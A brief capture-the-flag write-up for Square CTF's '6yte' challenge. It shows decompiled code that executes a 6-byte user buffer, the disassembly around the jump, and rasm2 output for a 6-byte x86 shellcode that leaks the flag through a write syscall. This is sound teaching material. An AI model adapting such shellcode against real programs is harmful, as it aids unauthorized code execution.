Square CTF writeup — 6yte

Cong Wang
Cong Wang
Oct 8, 2017 · 2 min read
    v5 = mmap(NULL, 6, 7, 33, -1, 0);
if (v2 == 0) {
// 0x8048889
printf("Shellcode location: %p\n", v5);
v4 = &v6;
printf("Flag location: %p\n", &v6);
sleep(1);
read_flag(v4);
g4 = v4;
g5 = 5;
g3 = 1;
g1 = 4;
((int32_t (*)())v5)();
return 0;
}
0x80488c9:   50                               push eax
0x80488ca: e8 1c fe ff ff call 0x80486eb <read_flag>
0x80488cf: 83 c4 10 add esp, 0x10
0x80488d2: 8d 85 68 ff ff ff lea eax, dword [ ebp + 0xffffff68 ]
0x80488d8: 89 c7 mov edi, eax
0x80488da: ba 05 00 00 00 mov edx, 0x5
0x80488df: bb 01 00 00 00 mov ebx, 0x1
0x80488e4: b8 04 00 00 00 mov eax, 0x4
0x80488e9: ff 65 e8 jmp dword [ ebp + 0xffffffe8 ]
% rasm2 'mov edx, 0x40; mov ecx, edi; int 0x80'
ba4000000089f9cd80
% rasm2 'mov dh, 0x1; mov ecx, edi; int 0x80'
b60189f9cd80
